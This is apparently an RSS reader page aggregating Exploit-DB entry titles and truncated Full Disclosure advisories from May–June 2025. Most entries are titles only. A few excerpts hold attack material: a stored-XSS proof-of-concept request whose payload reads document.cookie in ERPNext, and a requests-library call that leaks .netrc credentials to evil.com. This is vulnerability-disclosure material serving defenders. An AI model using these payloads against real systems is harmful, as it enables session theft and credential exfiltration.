FreshRSS

Exploit-DB Updates

[remote] FortiOS SSL-VPN 7.4.4 - Insufficient Session Expiration & Cookie Reuse

June 20th 2025 at 00:00

Exploit-DB Updates

[local] Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)

June 20th 2025 at 00:00

Exploit-DB Updates

[remote] Ingress-NGINX 4.11.0 - Remote Code Execution (RCE)

June 20th 2025 at 00:00

Full Disclosure

"Glass Cage" – Zero-Click iMessage → Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)

June 18th 2025 at 03:07

Posted by josephgoyd via Fulldisclosure on Jun 17

"Glass Cage" – Sophisticated Zero-Click iMessage Exploit Chain Enabling Persistent iOS Compromise and Device Bricking

CVE-2025-24085, CVE-2025-24201 (CNVD-2025-07885)

Author: Joseph Goydish II
Date: 06/10/2025
Release Type: Full Disclosure
Platform Affected: iOS 18.2 (confirmed zero-day at time of discovery)
Delivery Vector: iMessage (default configuration)
Impact: Remote Code Execution, Privilege Escalation, Keychain Exfiltration,...

Full Disclosure

SEC Consult SA-20250612-0 :: Reflected Cross-Site Scripting in ONLYOFFICE Docs (DocumentServer)

June 18th 2025 at 03:07

Posted by SEC Consult Vulnerability Lab via Fulldisclosure on Jun 17

SEC Consult Vulnerability Lab Security Advisory < 20250612-0 >
=======================================================================
title: Reflected Cross-Site Scripting
product: ONLYOFFICE Docs (DocumentServer)
vulnerable version: <=8.3.1
fixed version: 8.3.2 or higher
CVE number: CVE-2025-5301
impact: Medium
homepage: https://www.onlyoffice.com/...

Full Disclosure

SEC Consult SA-20250611-0 :: Undocumented Root Shell Access on SIMCom SIM7600G Modem

June 18th 2025 at 03:07

Posted by SEC Consult Vulnerability Lab via Fulldisclosure on Jun 17

SEC Consult Vulnerability Lab Security Advisory < 20250611-0 >
=======================================================================
title: Undocumented Root Shell Access
product: SIMCom - SIM7600G Modem
vulnerable version: Firmware Revision: LE20B03SIM7600M21-A
fixed version: -
CVE number: CVE-2025-26412
impact: Medium
homepage: https://www.simcom.com...

Full Disclosure

Call for Applications: ERCIM STM WG 2025 Award for the Best Ph.D. Thesis on Security and Trust Management (July 31, 2025)

June 18th 2025 at 03:03

Posted by 0610648533 on Jun 17

========================================================================

CALL FOR APPLICATIONS

ERCIM STM WG 2025 Award for the

Best Ph.D. Thesis on Security and Trust Management

========================================================================

The European Research Consortium in Informatics and Mathematics (ERCIM)
has a technical WG on Security and Trust Management (STM) for performing
a series of activities, as research projects,...

Exploit-DB Updates

[remote] WebDAV Windows 10 - Remote Code Execution (RCE)

June 15th 2025 at 00:00

Exploit-DB Updates

[webapps] Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation

June 15th 2025 at 00:00

Exploit-DB Updates

[remote] Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)

June 15th 2025 at 00:00

Exploit-DB Updates

[local] Parrot and DJI variants Drone OSes - Kernel Panic Exploit

June 15th 2025 at 00:00

Exploit-DB Updates

[webapps] PHP CGI Module 8.3.4 - Remote Code Execution (RCE)

June 15th 2025 at 00:00

Exploit-DB Updates

[local] Microsoft Excel Use After Free - Local Code Execution

June 15th 2025 at 00:00

Exploit-DB Updates

[remote] AirKeyboard iOS App 1.0.5 - Remote Input Injection

June 15th 2025 at 00:00

Exploit-DB Updates

[webapps] Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI

June 15th 2025 at 00:00

Exploit-DB Updates

[remote] PCMan FTP Server 2.0.7 - Buffer Overflow

June 15th 2025 at 00:00

Exploit-DB Updates

[webapps] Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

June 15th 2025 at 00:00

Exploit-DB Updates

[webapps] Roundcube 1.6.10 - Remote Code Execution (RCE)

June 13th 2025 at 00:00

Exploit-DB Updates

[remote] Windows File Explorer Windows 10 Pro x64 - TAR Extraction

June 13th 2025 at 00:00

Exploit-DB Updates

[remote] Freefloat FTP Server 1.0 - Remote Buffer Overflow

June 13th 2025 at 00:00

Full Disclosure

SEC Consult SA-20250604-0 :: Local Privilege Escalation and Default Credentials in INDAMED - MEDICAL OFFICE (Medical practice management) Demo version

June 10th 2025 at 02:44

Posted by SEC Consult Vulnerability Lab via Fulldisclosure on Jun 09

SEC Consult Vulnerability Lab Security Advisory < 20250604-0 >
=======================================================================
title: Local Privilege Escalation and Default Credentials
product: INDAMED - MEDICAL OFFICE (Medical practice management)
Demo version
vulnerable version: Revision 18544 (II/2024)
fixed version: Q2/2025 (Privilege Escalation, Default Password)...

Full Disclosure

Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain → Secure Enclave Key Theft, Wormable RCE, Crypto Theft

June 10th 2025 at 02:43

Posted by josephgoyd via Fulldisclosure on Jun 09

Hello Full Disclosure,

This is a strategic public disclosure of a zero-click iMessage exploit chain that was discovered live on iOS 18.2 and
remained unpatched through iOS 18.4. It enabled Secure Enclave key theft, wormable remote code execution, and
undetectable crypto wallet exfiltration. Despite responsible disclosure, the research was suppressed by the vendor.
Apple issued a silent fix in iOS 18.4.1 (April 2025) without public...

Exploit-DB Updates

[webapps] Laravel Pulse 1.3.1 - Arbitrary Code Injection

June 9th 2025 at 00:00

Exploit-DB Updates

[local] Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege

June 9th 2025 at 00:00

Exploit-DB Updates

[remote] ProSSHD 1.2 20090726 - Denial of Service (DoS)

June 9th 2025 at 00:00

Exploit-DB Updates

[local] TightVNC 2.8.83 - Control Pipe Manipulation

June 9th 2025 at 00:00

Exploit-DB Updates

[webapps] CloudClassroom PHP Project 1.0 - SQL Injection

June 5th 2025 at 00:00

Exploit-DB Updates

[remote] Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)

June 5th 2025 at 00:00

Exploit-DB Updates

[remote] Grandstream GSD3710 1.0.11.13 - Stack Overflow

June 5th 2025 at 00:00

Exploit-DB Updates

[local] macOS LaunchDaemon iOS 17.2 - Privilege Escalation

June 5th 2025 at 00:00

Exploit-DB Updates

[remote] ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)

June 5th 2025 at 00:00

Exploit-DB Updates

[remote] Apache Tomcat 10.1.39 - Denial of Service (DoS)

June 5th 2025 at 00:00

Full Disclosure

Defense in depth -- the Microsoft way (part 89): user group policies don't deserve tamper protection

June 3rd 2025 at 13:03

Posted by Stefan Kanthak on Jun 03

Hi @ll,

user group policies are stored in DACL-protected registry keys
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies]
respectively [HKEY_CURRENT_USER\Software\Policies] and below, where
only the SYSTEM account and members of the "Administrators" user group
are granted write access.

At logon the user's registry hive "%USERPROFILE%\ntuser.dat" is loaded
with exclusive (read, write and...

Full Disclosure

CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0

June 3rd 2025 at 13:03

Posted by Sanjay Singh on Jun 03

Hello Full Disclosure list,

I am sharing details of a newly assigned CVE affecting an open-source
educational software project:

------------------------------------------------------------------------
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP
Project v1.0
------------------------------------------------------------------------

Product: CloudClassroom PHP Project
Vendor:...

Full Disclosure

ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page

June 3rd 2025 at 13:03

Posted by Ron E on Jun 03

An authenticated attacker can inject JavaScript into the bio field of their
user profile. When the profile is viewed by another user, the injected
script executes.

*Proof of Concept:*

POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--

profile_info={"bio":"\"><img src=x onerror=alert(document.cookie)>"}

Full Disclosure

ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path

June 3rd 2025 at 13:02

Posted by Ron E on Jun 03

An authenticated user can inject malicious JavaScript into the user_image
field of the profile page using an XSS payload within the file path or HTML
context. This field is rendered without sufficient sanitization, allowing
stored script execution in the context of other authenticated users.

*Proof of Concept:*

POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--...

Full Disclosure

Local information disclosure in apport and systemd-coredump

June 3rd 2025 at 13:02

Posted by Qualys Security Advisory via Fulldisclosure on Jun 03

Qualys Security Advisory

Local information disclosure in apport and systemd-coredump
(CVE-2025-5054 and CVE-2025-4598)

========================================================================
Contents
========================================================================

Summary
Mitigation
Local information disclosure in apport (CVE-2025-5054)
- Background
- Analysis
- Proof of concept
Local information disclosure in systemd-coredump...

Full Disclosure

Stored XSS via File Upload - adaptcmsv3.0.3

June 3rd 2025 at 13:02

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS via File Upload #1:

Steps to Reproduce:

1. Login with low privilege user and visit "Profile" > "Edit Your Profile"

2. Click on "Choose File" and upload the following file

html-xss.html

<!DOCTYPE html>...

Full Disclosure

IDOR "Change Password" Functionality - adaptcmsv3.0.3

June 3rd 2025 at 13:02

Posted by Andrey Stoykov on Jun 03

# Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

IDOR "Change Password" Functionality #1:

Steps to Reproduce:

1. Login as user with low privilege and visit profile page
2. Select "Edit Your Profile" and click "Submit"
3. Trap the HTTP POST request
4. Set...

Full Disclosure

Stored XSS "Send Message" Functionality - adaptcmsv3.0.3

June 3rd 2025 at 13:02

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS "Send Message" Functionality #1:

Steps to Reproduce:

1. Login as normal user and visit "Profile" > "Message" > "Send Message"
2. In "Message" field enter the...

Full Disclosure

Authenticated File Upload to RCE - adaptcmsv3.0.3

June 3rd 2025 at 13:02

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Authenticated File Upload to RCE #1:

Steps to Reproduce:

1. Login as admin user and visit "System" > "Appearance" > "Themes" >
"Default" > "Theme Files" and choose "Add New File"...

Full Disclosure

Stored XSS in "Description" Functionality - cubecartv6.5.9

June 3rd 2025 at 13:02

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS in "Description" Functionality - cubecartv6.5.9
# Date: 05/2025
# Exploit Author: Andrey Stoykov
# Version: 6.5.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS #1:

Steps to Reproduce:

1. Visit "Account" > "Address Book" and choose "Edit"
2. In the "Description" parameter enter the following payload...

Full Disclosure

Multiple Vulnerabilities in SAP GuiXT Scripting

June 3rd 2025 at 13:02

Posted by Michał Majchrowicz via Fulldisclosure on Jun 03

Security Advisory

Vulnerabilities reported to vendor: March 13, 2025
Vendor requested additional information: March 20, 2025
Additional information provided to vendor: March 22, 2025
Vendor confirmed the reported issues but rejected them: March 31, 2025
Additional information provided to vendor: May 6, 2025
Vendor confirmed the reported issues but rejected them: May 15, 2025
Vendor closed the tickets for all reported issues: May 16, 2025
Public...

Full Disclosure

CVE-2024-47081: Netrc credential leak in PSF requests library

June 3rd 2025 at 13:00

Posted by Juho Forsén via Fulldisclosure on Jun 03

The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc
credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

requests.get('http://example.com:@evil.com/')

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

The root cause is...

Full Disclosure

Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)

June 3rd 2025 at 12:59

Posted by Housma mardini on Jun 03

Hi,

I am submitting an exploit for *CVE-2019-9978*, a remote code execution
vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2).

*Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare
WordPress Plugin (<= 3.5.2)

*Date*: 2025-05-20

*Exploit Author*: Huseyin Mardinli

*Vendor Homepage*: https://warfareplugins.com/

*Software Link*: https://wordpress.org/plugins/social-warfare/

*Version*: <= 3.5.2...

Full Disclosure

Youpot honeypot

June 3rd 2025 at 12:57

Posted by Jacek Lipkowski via Fulldisclosure on Jun 03

Hi,

I made a novel honeypot for worms called Youpot.

Normally a honeypot will try to implement whatever service it thinks the
attacker would like. For a high interaction or pure honeypot this is often
impossible, because of the thousands of possibilities. Even a simple
telnet server will have thousands of variants: different banners,
different shells, different default passwords, on different IoT devices
etc.

Youpot works around this by...

Exploit-DB Updates

[webapps] WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing

May 29th 2025 at 00:00

Exploit-DB Updates

[remote] Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass

May 29th 2025 at 00:00

Exploit-DB Updates

[remote] Automic Agent 24.3.0 HF4 - Privilege Escalation

May 29th 2025 at 00:00

Exploit-DB Updates

[remote] Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure

May 29th 2025 at 00:00

Exploit-DB Updates

[remote] SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal

May 29th 2025 at 00:00

Exploit-DB Updates

[webapps] Campcodes Online Hospital Management System 1.0 - SQL Injection

May 29th 2025 at 00:00

Full Disclosure

SEC Consult SA-20250521-0 :: Multiple Vulnerabilities in eCharge Hardy Barth cPH2 and cPP2 charging stations

May 28th 2025 at 03:20

Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 27

SEC Consult Vulnerability Lab Security Advisory < 20250521-0 >
=======================================================================
title: Multiple Vulnerabilities
product: eCharge Hardy Barth cPH2 and cPP2 charging stations
vulnerable version: 2.2.0
fixed version: Not available
CVE number: CVE-2025-27803, CVE-2025-27804, CVE-2025-48413,
CVE-2025-48414, CVE-2025-48415,...

Full Disclosure

Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework

May 28th 2025 at 03:19

Posted by Ron E on May 27

An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework,
affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows
low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause.

Sample Structured Query Language Injection:

Request:

GET...

Exploit-DB Updates

[remote] ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation

May 25th 2025 at 00:00

Exploit-DB Updates

[local] ABB Cylon Aspect Studio 3.08.03 - Binary Planting

May 25th 2025 at 00:00

Exploit-DB Updates

[remote] Windows 2024.15 - Unauthenticated Desktop Screenshot Capture

May 25th 2025 at 00:00

Exploit-DB Updates

[local] Microsoft Windows Server 2016 - Win32k Elevation of Privilege

May 25th 2025 at 00:00

Exploit-DB Updates

[webapps] WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass

May 25th 2025 at 00:00

Exploit-DB Updates

[remote] Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow

May 25th 2025 at 00:00